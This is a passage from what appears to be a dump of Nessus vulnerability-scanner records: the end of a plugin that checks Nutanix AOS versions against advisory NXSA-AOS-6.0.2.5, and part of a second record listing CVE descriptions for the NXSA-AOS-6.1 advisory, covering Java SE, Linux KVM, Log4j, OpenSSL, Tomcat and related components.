Note: This vulnerability can only be exploited by supplying\n data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted\n Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35565)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Libraries). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows low privileged attacker\n with network access via Kerberos to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful\n attacks require human interaction from a person other than the attacker and while the vulnerability is in\n Java SE, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products.\n Successful attacks of this vulnerability can result in unauthorized access to critical data or complete\n access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies\n to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 6.8 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). (CVE-2021-35567)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 8u301, 11.0.12, 17; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. 
Easily exploitable vulnerability allows unauthenticated attacker with network\n access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability can only be exploited by supplying\n data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted\n Java applets, such as through a web service. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35578)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n ImageIO). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to\n Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component,\n e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35586)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). 
Supported versions that are affected are Java SE: 7u311, 8u301; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful\n attacks require human interaction from a person other than the attacker. Successful attacks of this\n vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of\n Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through\n a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.1 (Availability impacts). CVSS\n Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L). (CVE-2021-35588)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM\n Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker\n with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks\n of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM\n Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in\n clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run\n untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. 
This\n vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service\n which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2021-35603)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when\n processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested\n guest (L2). Due to improper validation of the int_ctl field, this issue could allow a malicious L1 to\n enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest\n would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak\n of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to\n 5.14-rc7. (CVE-2021-3653)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when\n processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested\n guest (L2). Due to improper validation of the virt_ext field, this issue could allow a malicious L1 to\n disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the\n L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire\n system, leak of sensitive data or potential guest-to-host escape. (CVE-2021-3656)\n\n - arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc platform allows KVM guest\n OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e. 
(CVE-2021-37576)\n\n - The Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) before 1.18.5 and 1.19.x before 1.19.3 has\n a NULL pointer dereference in kdc/do_tgs_req.c via a FAST inner body that lacks a server field.\n (CVE-2021-37750)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows\n privilege escalation because supplemental groups are not initialized as expected. Helper programs for\n AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group\n memberships of the sshd process, if the configuration specifies running the command as a different user.\n (CVE-2021-41617)\n\n - The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to\n 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP\n upgrade connections was not released for WebSocket connections once the connection was closed. This\n created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.\n (CVE-2021-42340)\n\n - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through\n 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft\n source code that renders different logic than the logical ordering of tokens ingested by compilers and\n interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such\n that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium\n offers the following alternative approach to presenting this concern. 
An issue is noted in the nature of\n international text that can affect applications that implement support for The Unicode Standard and the\n Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to-\n right and right-to-left characters, the visual order of tokens may be different from their logical order.\n Additionally, control characters needed to fully support the requirements of bidirectional text can\n further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such\n that the ordering of tokens perceived by human reviewers does not match what will be processed by a\n compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its\n document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also\n provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode\n Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the\n BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading\n visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.\n (CVE-2021-42574)\n\n - NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow\n when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures\n encoded within CMS, S/MIME, PKCS \\#7, or PKCS \\#12 are likely to be impacted. Applications using NSS for\n certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how\n they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and\n PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and\n Evince are believed to be impacted. 
This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\n (CVE-2021-43527)\n\n - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-\n default configurations. This could allows attackers with control over Thread Context Map (MDC) input data\n when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for\n example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input\n data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some\n environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix\n this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n (CVE-2021-45046)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://download.nutanix.com/advisories/NXSA-AOS-6-0-2-5.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the Nutanix AOS software to recommended version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4658\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-43527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/09/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:nutanix:aos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"nutanix_collect.nasl\");\n script_require_keys(\"Host/Nutanix/Data/lts\", \"Host/Nutanix/Data/Service\", \"Host/Nutanix/Data/Version\", \"Host/Nutanix/Data/arch\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::nutanix::get_app_info();\n\nvar constraints = [\n { 'fixed_version' : '6.0.2.5', 'product' : 'AOS', 'fixed_display' : 'Upgrade the AOS install to 6.0.2.5 or higher.', 'lts' : FALSE },\n { 'fixed_version' : '6.0.2.5', 'product' : 'NDFS', 'fixed_display' : 'Upgrade the AOS install to 6.0.2.5 or higher.', 'lts' : FALSE }\n];\n\nvcf::nutanix::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-30T16:16:28", "description": "The version of AOS installed on the remote host is prior to 6.1. It is, therefore, affected by multiple vulnerabilities as referenced in the NXSA-AOS-6.1 advisory.\n\n - Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). 
Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16;\n Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N). (CVE-2021-2163)\n\n - Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.\n (CVE-2017-5715)\n\n - Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis.\n (CVE-2017-5753)\n\n - Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache. (CVE-2017-5754)\n\n - An issue was discovered in the Linux kernel through 5.11.3. A kernel pointer leak can be used to determine the address of the iscsi_transport structure. 
When an iSCSI transport is registered with the iSCSI subsystem, the transport's handle is available to unprivileged users via the sysfs file system, at /sys/class/iscsi_transport/$TRANSPORT_NAME/handle. When read, the show_transport_handle function (in drivers/scsi/scsi_transport_iscsi.c) is called, which leaks the handle. This handle is actually the pointer to an iscsi_transport struct in the kernel module's global variables. (CVE-2021-27363)\n\n - An issue was discovered in the Linux kernel through 5.11.3. drivers/scsi/scsi_transport_iscsi.c is adversely affected by the ability of an unprivileged user to craft Netlink messages. (CVE-2021-27364)\n\n - An issue was discovered in the Linux kernel through 5.11.3. Certain iSCSI data structures do not have appropriate length constraints or checks, and can exceed the PAGE_SIZE value. An unprivileged user can send a Netlink message that is associated with iSCSI, and has a length up to the maximum length of a Netlink message. (CVE-2021-27365)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Networking). Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. 
This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). (CVE-2021-2341)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Library). Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 4.3 (Integrity impacts).\n CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N). (CVE-2021-2369)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Hotspot). Supported versions that are affected are Java SE: 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. 
Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H). (CVE-2021-2388)\n\n - NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS \\#7, or PKCS \\#12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and Evince are believed to be impacted. 
This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\n (CVE-2021-43527)\n\n - xpointer.c in libxml2 before 2.9.5 (as used in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3, and other products) does not forbid namespace nodes in XPointer ranges, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free and memory corruption) via a crafted XML document. (CVE-2016-4658)\n\n - A flaw was found in the way RTAS handled memory accesses in userspace to kernel communication. On a locked down (usually due to Secure Boot) guest system running on top of PowerVM or KVM hypervisors (pseries platform) a root like local user could use this flaw to further increase their privileges to that of a running kernel. (CVE-2020-27777)\n\n - A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c.\n This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user name space (CVE-2021-22555)\n\n - BPF JIT compilers in the Linux kernel through 5.11.12 have incorrect computation of branch displacements, allowing them to execute arbitrary code within the kernel context. This affects arch/x86/net/bpf_jit_comp.c and arch/x86/net/bpf_jit_comp32.c. (CVE-2021-29154)\n\n - An issue was discovered in the Linux kernel before 5.11.11. The netfilter subsystem allows attackers to cause a denial of service (panic) because net/netfilter/x_tables.c and include/linux/netfilter/x_tables.h lack a full memory barrier upon the assignment of a new table value, aka CID-175e476b8cdf.\n (CVE-2021-29650)\n\n - net/bluetooth/hci_request.c in the Linux kernel through 5.12.2 has a race condition for removal of the HCI controller. 
(CVE-2021-32399)\n\n - Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances leading to the possibility of request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identity encoding;\n and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding.\n (CVE-2021-33037)\n\n - In BIND 9.0.0 -> 9.11.29, 9.12.0 -> 9.16.13, and versions BIND 9.9.3-S1 -> 9.11.29-S1 and 9.16.8-S1 -> 9.16.13-S1 of BIND Supported Preview Edition, as well as release versions 9.17.0 -> 9.17.11 of the BIND 9.17 development branch, when a vulnerable version of named receives a query for a record triggering the flaw described above, the named process will terminate due to a failed assertion check. The vulnerability affects all currently maintained BIND 9 branches (9.11, 9.11-S, 9.16, 9.16-S, 9.17) as well as all other versions of BIND 9. (CVE-2021-25215)\n\n - Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16;\n Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. 
It can also be exploited by supplying untrusted data to APIs in the specified Component. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N). (CVE-2021-2161)\n\n - Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n (CVE-2021-44832)\n\n - An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. (CVE-2021-22543)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the int_ctl field, this issue could allow a malicious L1 to enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to 5.14-rc7. (CVE-2021-3653)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). 
Due to improper validation of the virt_ext field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape. (CVE-2021-3656)\n\n - arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc platform allows KVM guest OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e. (CVE-2021-37576)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. (CVE-2021-30640)\n\n - Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissible length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash.\n OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i).\n Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). 
(CVE-2021-23840)\n\n - The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23841)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. 
Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). (CVE-2021-35550)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35556)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. 
Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2021-35559)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n Utility). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition.\n Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). 
